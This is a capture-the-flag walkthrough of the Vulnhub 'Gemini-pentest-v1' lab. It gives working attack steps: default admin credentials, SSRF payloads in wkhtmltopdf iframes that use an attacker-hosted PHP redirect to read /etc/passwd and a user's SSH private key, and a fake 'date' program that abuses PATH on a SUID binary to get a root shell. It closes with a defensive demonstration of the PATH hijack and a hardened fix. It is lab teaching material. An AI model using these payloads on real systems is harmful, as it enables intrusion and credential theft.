Vulnhub Lab Walkthrough: Gemini-pentest-v1
Information Gathering
└─# cat nmapscan/info
# Nmap 7.93 scan initiated Tue Aug 1 20:31:00 2023 as: nmap -sT -sV -sC -O -p22,80 -o nmapscan/info 10.20.22.135
Nmap scan report for 10.20.22.135
Host is up (0.00053s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 e9e389b63beae413c8ac3844d6eac0e4 (RSA)
| 256 8c1977fd36727e3446c4292d2aac1598 (ECDSA)
|_ 256 cc2b4cced76173d7d87e245674549988 (ED25519)
80/tcp open http Apache httpd 2.4.25
|_http-server-header: Apache/2.4.25 (Debian)
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2018-01-07 08:35 test2/
|_
|_http-title: Index of /
MAC Address: 00:0C:29:59:6C:63 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 1 20:31:08 2023 -- 1 IP address (1 host up) scanned in 9.06 seconds
// The server exposes only ports 22 (SSH) and 80 (HTTP).
Port-by-Port Exploitation
Web (port 80)
The index page lists a single directory, test2/. Inside it is a content management system that can export records as PDF files; its source code is published on GitHub.
Reviewing that source turned up install.php, which prints the default credentials once installation completes:
if(!isset($page->error)) {
$page->success = "The installation was successful ! Thank you for using master loging system and we hope you enjo it ! Have fun ! <br/><br/>
<a class='btn btn-success' href='./index.php'>Start exploring</a>
<br/><br/>
<h3>USER: admin <br/> PASSWORD: 1234</h3>";
}
So once installation finishes the page links back to index.php, and the application ships with an initial account: admin / 1234.
Logging in as admin worked, and the admin profile page has a function that exports the user's details as a PDF.
The PDF is generated with wkhtmltopdf 0.12.4. A quick search shows this program is affected by SSRF (Server-Side Request Forgery): the attacker supplies content that the server-side renderer fetches, so the server itself issues the requests.
SSRF vulnerability
How it works
The server-side component fetches content from other hosts on the user's behalf and neither filters nor restricts the target address.
Here, wkhtmltopdf renders whatever HTML ends up in the page, including iframe tags. Putting an iframe in the Display name field makes the renderer, running on the server, request arbitrary URLs and ultimately read local files. (Two mitigations are relevant: user-controlled text should be HTML-escaped before it reaches the renderer, and wkhtmltopdf has a --disable-local-file-access option for exactly this case.)
漏洞利用
Local file read
<iframe height="2000" width="800" src="file:///etc/passwd"></iframe>
A direct file:// iframe produces no content in the exported PDF: the renderer refuses to load file:// URLs from a page fetched over HTTP. It will, however, follow an HTTP redirect whose Location header points at file://, which is what the next step uses.
Remote read (redirect through an attacker-hosted script)
<?php header('location:file://'.$_REQUEST['uri']); ?>
<iframe height="2000" width="800" src="http://<kali temporary web server>/shell.php?uri=/etc/passwd"></iframe>
The exported PDF now contains the file:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
geoclue:x:109:115::/var/lib/geoclue:/bin/false
avahi:x:112:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:113:120:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:114:121::/var/lib/saned:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:122:Gnome Display Manager:/var/lib/gdm3:/bin/false
gemini1:x:1000:1000:gemini-sec,,,:/home/gemini1:/bin/bash
sshd:x:117:65534::/run/sshd:/usr/sbin/nologin
mysql:x:118:123:MySQL Server,,,:/nonexistent:/bin/false
The target's file system can be read. /etc/passwd shows one interactive user, gemini1, and SSH is open, so the obvious next target is that user's private key:
/home/gemini1/.ssh/id_rsa
The remote read fetched gemini1's private key successfully (copy it out of the PDF, save it as id_rsa and chmod 600 it, since ssh refuses a key file with looser permissions):
<iframe height="2000" width="800" src="http://10.20.30.129:800/she.php?uri=/home/gemini1/.ssh/id_rsa"></iframe>
SSH (port 22)
└─# ssh -i id_rsa gemini1@10.20.30.128
Linux geminiinc 4.9.0-4-amd64 #1 SMP Debian 4.9.65-3+deb9u1 (2017-12-23) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Aug 5 20:48:06 2023 from 10.20.30.129
gemini1@geminiinc:~$
That gives an initial, unprivileged foothold as gemini1.
Privilege Escalation
SUID binary with a PATH-hijackable command
gemini1@geminiinc:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/apache2/suexec-pristine
/usr/lib/apache2/suexec-custom
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/sbin/pppd
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/listinfo
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/sudo
/bin/mount
/bin/umount
/bin/ping
/bin/su
/bin/fusermount
The first candidate was /usr/lib/dbus-1.0/dbus-daemon-launch-helper, but using it requires a password, and I could not find one anywhere on the system.
Going on through the list, /usr/bin/listinfo is not a standard Debian binary, so it is worth running:
gemini1@geminiinc:~$ /usr/bin/listinfo
displaying network information... inet 10.20.30.128 netmask 255.255.255.0 broadcast 10.20.30.255
displaying network information... inet6 fe80::20c:29ff:fe59:6c63 prefixlen 64 scopeid 0x20<link>
displaying network information... inet 127.0.0.1 netmask 255.0.0.0
displaying network information... inet6 ::1 prefixlen 128 scopeid 0x10<host>
displaying Apache listening port... tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
displaying Apache listening port... tcp6 0 0 :::22 :::* LISTEN
displaying SSH listening port... tcp6 0 0 :::80 :::* LISTEN
displaying current date... Sat Aug 5 22:32:02 EDT 2023
The program prints interface addresses, listening ports and the current date. Inspecting the binary shows the commands it runs:
/sbin/ifconfig | grep inet
/bin/netstat -tuln | grep 22
/bin/netstat -tuln | grep 80
date
ifconfig and netstat are invoked by absolute path, but date is invoked by bare name, so it is resolved through whatever PATH the caller supplies. Because listinfo is SUID root and does not reset its environment, prepending a directory I control to PATH makes it execute my own date binary, which can be any program, for instance one that spawns a root shell. Source of the fake date (date.c):
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

/* Fake "date": when listinfo (SUID root) runs it, the effective uid is already 0,
 * so setuid(0)/setgid(0) make the real ids root as well. That matters because
 * bash drops privileges on startup if euid != uid. */
int main(void) {
    setgid(0);
    setuid(0);
    system("/bin/bash");
    return 0;
}
gemini1@geminiinc:~$ gcc date.c -o date
gemini1@geminiinc:~$ export PATH=.:$PATH
gemini1@geminiinc:~$ echo $PATH
.:././usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
gemini1@geminiinc:~$ /usr/bin/listinfo
displaying network information... inet 10.20.30.128 netmask 255.255.255.0 broadcast 10.20.30.255
displaying network information... inet6 fe80::20c:29ff:fe59:6c63 prefixlen 64 scopeid 0x20<link>
displaying network information... inet 127.0.0.1 netmask 255.0.0.0
displaying network information... inet6 ::1 prefixlen 128 scopeid 0x10<host>
displaying Apache listening port... tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
displaying Apache listening port... tcp6 0 0 :::22 :::* LISTEN
displaying SSH listening port... tcp6 0 0 :::80 :::* LISTEN
displaying current date... root@geminiinc:~# whoami
root
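To make the mechanism reproducible without a SUID binary, here is an added example (not from the write-up, and not the lab's listinfo) in plain shell: a stand-in that reproduces the one defect that matters, the unqualified date call, beside a hardened variant, plus a helper that runs either one with a fake date directory prepended to PATH. The fake date only prints a marker instead of spawning a shell, so this is safe to run as any user; the function names are my own.

```shell
#!/bin/sh
# Added example: PATH hijack of an unqualified command, as used against listinfo.
# Nothing here is SUID; the stand-ins below only model the lookup behaviour.

# Vulnerable stand-in: like listinfo, it calls `date` by bare name, so the
# caller's PATH decides which binary actually runs.
vulnerable_listinfo() {
    printf 'displaying current date... '
    date
}

# Hardened stand-in: a fixed PATH that ignores the caller's, plus an absolute
# path. A SUID program should do both, since the caller controls its environment.
hardened_listinfo() {
    printf 'displaying current date... '
    PATH=/usr/bin:/bin /bin/date
}

# Run the named function with a throw-away directory holding a fake `date`
# prepended to PATH (the same idea as `export PATH=.:$PATH` above) and print
# what it produced.
run_with_hijacked_path() {
    target=$1
    work=$(mktemp -d)
    cat > "$work/date" <<'EOF'
#!/bin/sh
echo HIJACKED
EOF
    chmod 755 "$work/date"
    # The subshell confines the PATH change to this one invocation.
    out=$( PATH="$work:$PATH"; export PATH; "$target" )
    rm -rf "$work"
    printf '%s\n' "$out"
}

# Stand-alone demonstration: the first line ends in HIJACKED, the second in a real date.
run_with_hijacked_path vulnerable_listinfo
run_with_hijacked_path hardened_listinfo
```

The hardened variant is the fix a developer should have shipped: a SUID program must set PATH itself (or exec by absolute path) rather than trust the environment it inherits. On the defensive side, the same find command used above, filtered against the package database, is a quick way to spot non-packaged SUID binaries like listinfo during a review.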